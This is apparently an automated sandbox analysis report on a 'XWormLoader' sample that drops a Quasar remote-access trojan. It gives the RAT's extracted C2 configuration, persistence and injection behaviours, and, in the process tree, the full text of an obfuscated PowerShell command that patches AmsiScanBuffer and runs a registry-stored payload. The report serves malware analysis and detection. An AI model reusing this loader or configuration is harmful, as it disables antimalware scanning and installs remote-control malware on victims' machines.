Analysis
-
max time kernel
150s -
max time network
135s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
03-05-2024 17:47
Static task
static1
Behavioral task
behavioral1
Sample
XWormLoader 5.2 x64.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
XWormLoader 5.2 x64.exe
Resource
win10v2004-20240419-en
General
-
Target
XWormLoader 5.2 x64.exe
-
Size
329KB
-
MD5
893ee266eef0ca3b11bdb859839df69d
-
SHA1
1d2eeab0c7ae7e9ec180017d8092f23abbea6d2b
-
SHA256
40c49ccfb00bd4ca02d587af4f03823650dde39b5fe31dcde8bbdc3fa508bea3
-
SHA512
694843c573f2aeec876eaa0ef329268553cde23cc4fdced9371041c3df097eec00b44894423ee00a7c9a1444f0bb17a089cb48c5430dfdaafa1265e5cd1b85f5
-
SSDEEP
6144:HfPtIkJwV7LtIgxfUFdLdassJFxgXS+vK5Qav9qm:HflXJwFmmUFdLs9H51
Malware Config
Extracted
quasar
3.1.5
SLAVE
even-lemon.gl.at.ply.gg:33587
$Sxr-3vDee7FzoJnhqjuE3n
-
encryption_key
AqYe7s30CMq7SVM0oxKR
-
install_name
Discord.exe
-
log_directory
Logs
-
reconnect_delay
1000
-
startup_key
Discord
-
subdirectory
Discord
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\svchost.exe family_quasar behavioral1/memory/4644-17-0x00000000008F0000-0x000000000095C000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 4708 created 584 4708 powershell.EXE winlogon.exe PID 1456 created 584 1456 powershell.EXE winlogon.exe -
Downloads MZ/PE file
-
Executes dropped EXE 5 IoCs
Processes:
svchost.exeXWormLoader 5.2 x32.exeDiscord.exeinstall.exeinstall.exepid process 4644 svchost.exe 4908 XWormLoader 5.2 x32.exe 1224 Discord.exe 2120 install.exe 4316 install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 9 raw.githubusercontent.com 10 raw.githubusercontent.com 19 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 4 ip-api.com -
Drops file in System32 directory 8 IoCs
Processes:
OfficeClickToRun.exepowershell.EXEsvchost.exepowershell.EXEdescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 OfficeClickToRun.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Tasks\$77Discord.exe svchost.exe File opened for modification C:\Windows\System32\Tasks\$77svc64 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 OfficeClickToRun.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 4708 set thread context of 4472 4708 powershell.EXE dllhost.exe PID 1456 set thread context of 4328 1456 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4224 4908 WerFault.exe XWormLoader 5.2 x32.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeSCHTASKS.exeschtasks.exeSCHTASKS.exepid process 4668 schtasks.exe 4928 SCHTASKS.exe 1688 schtasks.exe 4320 SCHTASKS.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEpowershell.EXEOfficeClickToRun.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={5EBEFE70-DFDA-4E14-92CD-1F42C9391953}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.EXEdllhost.exeDiscord.exepid process 4708 powershell.EXE 4708 powershell.EXE 4708 powershell.EXE 4708 powershell.EXE 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 1224 Discord.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 1224 Discord.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 1224 Discord.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 1224 Discord.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe 4472 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3396 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 35 IoCs
Processes:
svchost.exepowershell.EXEDiscord.exedllhost.exesvchost.exeExplorer.EXEpowershell.EXEdllhost.exedescription pid process Token: SeDebugPrivilege 4644 svchost.exe Token: SeDebugPrivilege 4708 powershell.EXE Token: SeDebugPrivilege 1224 Discord.exe Token: SeDebugPrivilege 4708 powershell.EXE Token: SeDebugPrivilege 4472 dllhost.exe Token: SeAuditPrivilege 2472 svchost.exe Token: SeShutdownPrivilege 3396 Explorer.EXE Token: SeCreatePagefilePrivilege 3396 Explorer.EXE Token: SeShutdownPrivilege 3396 Explorer.EXE Token: SeCreatePagefilePrivilege 3396 Explorer.EXE Token: SeShutdownPrivilege 3396 Explorer.EXE Token: SeCreatePagefilePrivilege 3396 Explorer.EXE Token: SeShutdownPrivilege 3396 Explorer.EXE Token: SeCreatePagefilePrivilege 3396 Explorer.EXE Token: SeShutdownPrivilege 3396 Explorer.EXE Token: SeCreatePagefilePrivilege 3396 Explorer.EXE Token: SeShutdownPrivilege 3396 Explorer.EXE Token: SeCreatePagefilePrivilege 3396 Explorer.EXE Token: SeShutdownPrivilege 3396 Explorer.EXE Token: SeCreatePagefilePrivilege 3396 Explorer.EXE Token: SeShutdownPrivilege 3396 Explorer.EXE Token: SeCreatePagefilePrivilege 3396 Explorer.EXE Token: SeShutdownPrivilege 3396 Explorer.EXE Token: SeCreatePagefilePrivilege 3396 Explorer.EXE Token: SeDebugPrivilege 1456 powershell.EXE Token: SeDebugPrivilege 1456 powershell.EXE Token: SeDebugPrivilege 4328 dllhost.exe Token: SeShutdownPrivilege 3396 Explorer.EXE Token: SeCreatePagefilePrivilege 3396 Explorer.EXE Token: SeShutdownPrivilege 3396 Explorer.EXE Token: SeCreatePagefilePrivilege 3396 Explorer.EXE Token: SeShutdownPrivilege 3396 Explorer.EXE Token: SeCreatePagefilePrivilege 3396 Explorer.EXE Token: SeShutdownPrivilege 3396 Explorer.EXE Token: SeCreatePagefilePrivilege 3396 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
XWormLoader 5.2 x64.exesvchost.exeDiscord.exepowershell.EXEdllhost.exedescription pid process target process PID 2452 wrote to memory of 4644 2452 XWormLoader 5.2 x64.exe svchost.exe PID 2452 wrote to memory of 4644 2452 XWormLoader 5.2 x64.exe svchost.exe PID 2452 wrote to memory of 4644 2452 XWormLoader 5.2 x64.exe svchost.exe PID 2452 wrote to memory of 4908 2452 XWormLoader 5.2 x64.exe XWormLoader 5.2 x32.exe PID 2452 wrote to memory of 4908 2452 XWormLoader 5.2 x64.exe XWormLoader 5.2 x32.exe PID 2452 wrote to memory of 4908 2452 XWormLoader 5.2 x64.exe XWormLoader 5.2 x32.exe PID 4644 wrote to memory of 4668 4644 svchost.exe schtasks.exe PID 4644 wrote to memory of 4668 4644 svchost.exe schtasks.exe PID 4644 wrote to memory of 4668 4644 svchost.exe schtasks.exe PID 4644 wrote to memory of 1224 4644 svchost.exe Discord.exe PID 4644 wrote to memory of 1224 4644 svchost.exe Discord.exe PID 4644 wrote to memory of 1224 4644 svchost.exe Discord.exe PID 4644 wrote to memory of 2120 4644 svchost.exe install.exe PID 4644 wrote to memory of 2120 4644 svchost.exe install.exe PID 4644 wrote to memory of 2120 4644 svchost.exe install.exe PID 4644 wrote to memory of 4928 4644 svchost.exe SCHTASKS.exe PID 4644 wrote to memory of 4928 4644 svchost.exe SCHTASKS.exe PID 4644 wrote to memory of 4928 4644 svchost.exe SCHTASKS.exe PID 1224 wrote to memory of 1688 1224 Discord.exe schtasks.exe PID 1224 wrote to memory of 1688 1224 Discord.exe schtasks.exe PID 1224 wrote to memory of 1688 1224 Discord.exe schtasks.exe PID 4708 wrote to memory of 4472 4708 powershell.EXE dllhost.exe PID 4708 wrote to memory of 4472 4708 powershell.EXE dllhost.exe PID 4708 wrote to memory of 4472 4708 powershell.EXE dllhost.exe PID 4708 wrote to memory of 4472 4708 powershell.EXE dllhost.exe PID 4708 wrote to memory of 4472 4708 powershell.EXE dllhost.exe PID 4708 wrote to memory of 4472 4708 powershell.EXE dllhost.exe PID 4708 wrote to memory of 4472 4708 powershell.EXE dllhost.exe PID 4708 wrote to memory of 4472 4708 powershell.EXE dllhost.exe PID 4472 wrote to memory of 584 4472 dllhost.exe winlogon.exe PID 4472 wrote to memory of 640 4472 dllhost.exe lsass.exe PID 4472 wrote to memory of 740 4472 dllhost.exe svchost.exe PID 4472 wrote to memory of 904 4472 dllhost.exe svchost.exe PID 4472 wrote to memory of 992 4472 dllhost.exe dwm.exe PID 4472 wrote to memory of 368 4472 dllhost.exe svchost.exe PID 4472 wrote to memory of 372 4472 dllhost.exe svchost.exe PID 4472 wrote to memory of 592 4472 dllhost.exe svchost.exe PID 4472 wrote to memory of 1096 4472 dllhost.exe svchost.exe PID 4472 wrote to memory of 1108 4472 dllhost.exe svchost.exe PID 4472 wrote to memory of 1184 4472 dllhost.exe svchost.exe PID 4472 wrote to memory of 1216 4472 dllhost.exe svchost.exe PID 4472 wrote to memory of 1236 4472 dllhost.exe svchost.exe PID 4472 wrote to memory of 1252 4472 dllhost.exe svchost.exe PID 4472 wrote to memory of 1396 4472 dllhost.exe svchost.exe PID 4472 wrote to memory of 1428 4472 dllhost.exe svchost.exe PID 4472 wrote to memory of 1472 4472 dllhost.exe svchost.exe PID 4472 wrote to memory of 1540 4472 dllhost.exe svchost.exe PID 4472 wrote to memory of 1580 4472 dllhost.exe svchost.exe PID 4472 wrote to memory of 1600 4472 dllhost.exe svchost.exe PID 4472 wrote to memory of 1680 4472 dllhost.exe svchost.exe PID 4472 wrote to memory of 1720 4472 dllhost.exe svchost.exe PID 4472 wrote to memory of 1756 4472 dllhost.exe svchost.exe PID 4472 wrote to memory of 1772 4472 dllhost.exe svchost.exe PID 4472 wrote to memory of 1848 4472 dllhost.exe svchost.exe PID 4472 wrote to memory of 1856 4472 dllhost.exe svchost.exe PID 4472 wrote to memory of 1940 4472 dllhost.exe spoolsv.exe PID 4472 wrote to memory of 1992 4472 dllhost.exe svchost.exe PID 4472 wrote to memory of 2144 4472 dllhost.exe svchost.exe PID 4472 wrote to memory of 2236 4472 dllhost.exe svchost.exe PID 4472 wrote to memory of 2472 4472 dllhost.exe svchost.exe PID 4472 wrote to memory of 2492 4472 dllhost.exe svchost.exe PID 4472 wrote to memory of 2580 4472 dllhost.exe sihost.exe PID 4472 wrote to memory of 2588 4472 dllhost.exe svchost.exe PID 4472 wrote to memory of 2660 4472 dllhost.exe svchost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:584
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:992
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{b7ed216d-36c9-4799-9373-e801882d34a0}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4472 -
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{2e2f3f37-3868-43d0-99a9-e46554d2d109}2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4328
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:640
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵PID:740
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵PID:904
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:368
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵PID:372
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵PID:592
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵PID:1096
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
PID:1108 -
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2876
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:kDafqIzcVOZr{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$dNJlpaIqkcJJOz,[Parameter(Position=1)][Type]$MYcnqmmqBr)$yOpGEbWgkBi=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+'f'+''+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+'D'+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+'e'+''+[Char](109)+'or'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType('M'+'y'+''+'D'+''+'e'+''+'l'+''+'e'+''+'g'+''+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+','+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+'c'+''+','+''+'S'+'e'+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+'ss',[MulticastDelegate]);$yOpGEbWgkBi.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$dNJlpaIqkcJJOz).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+'i'+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+[Char](97)+''+'n'+'a'+[Char](103)+''+[Char](101)+'d');$yOpGEbWgkBi.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+'ke','P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+'H'+[Char](105)+''+[Char](100)+'eBy'+'S'+''+[Char](105)+'g'+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+'S'+'l'+'o'+''+'t'+','+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'al',$MYcnqmmqBr,$dNJlpaIqkcJJOz).SetImplementationFlags(''+'R'+''+'u'+''+'n'+'ti'+'m'+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+'ed');Write-Output $yOpGEbWgkBi.CreateType();}$tnmxbiJhbugcG=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+'f'+'e'+''+[Char](78)+''+'a'+'tiv'+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$igKlxdWSgQjiSu=$tnmxbiJhbugcG.GetMethod('G'+[Char](101)+''+[Char](116)+''+'P'+'ro'+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+'e'+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+'c'+','+''+[Char](83)+'t'+[Char](97)+'t'+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$YZNYqkjNuIGkcAYiiRk=kDafqIzcVOZr @([String])([IntPtr]);$EwWqUOKINAEcWwSeVRgfKU=kDafqIzcVOZr @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$FrfownYyaSe=$tnmxbiJhbugcG.GetMethod('Ge'+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+''+'H'+''+'a'+''+[Char](110)+'d'+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+'el'+'3'+''+[Char](50)+''+'.'+''+'d'+''+'l'+''+[Char](108)+'')));$jWDCycmIrTcRTW=$igKlxdWSgQjiSu.Invoke($Null,@([Object]$FrfownYyaSe,[Object](''+[Char](76)+'o'+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+'a'+''+[Char](114)+''+'y'+''+[Char](65)+'')));$APlxsjdhGyvfAmovr=$igKlxdWSgQjiSu.Invoke($Null,@([Object]$FrfownYyaSe,[Object]('V'+'i'+'rt'+'u'+'al'+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$BSwitSz=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jWDCycmIrTcRTW,$YZNYqkjNuIGkcAYiiRk).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+'i'+'.'+[Char](100)+'ll');$bLpawPucSezYJCSSI=$igKlxdWSgQjiSu.Invoke($Null,@([Object]$BSwitSz,[Object](''+'A'+''+[Char](109)+'siSc'+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+'e'+[Char](114)+'')));$whOefGtDTQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($APlxsjdhGyvfAmovr,$EwWqUOKINAEcWwSeVRgfKU).Invoke($bLpawPucSezYJCSSI,[uint32]8,4,[ref]$whOefGtDTQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$bLpawPucSezYJCSSI,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($APlxsjdhGyvfAmovr,$EwWqUOKINAEcWwSeVRgfKU).Invoke($bLpawPucSezYJCSSI,[uint32]8,0x20,[ref]$whOefGtDTQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+[Char](84)+'W'+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+'ag'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
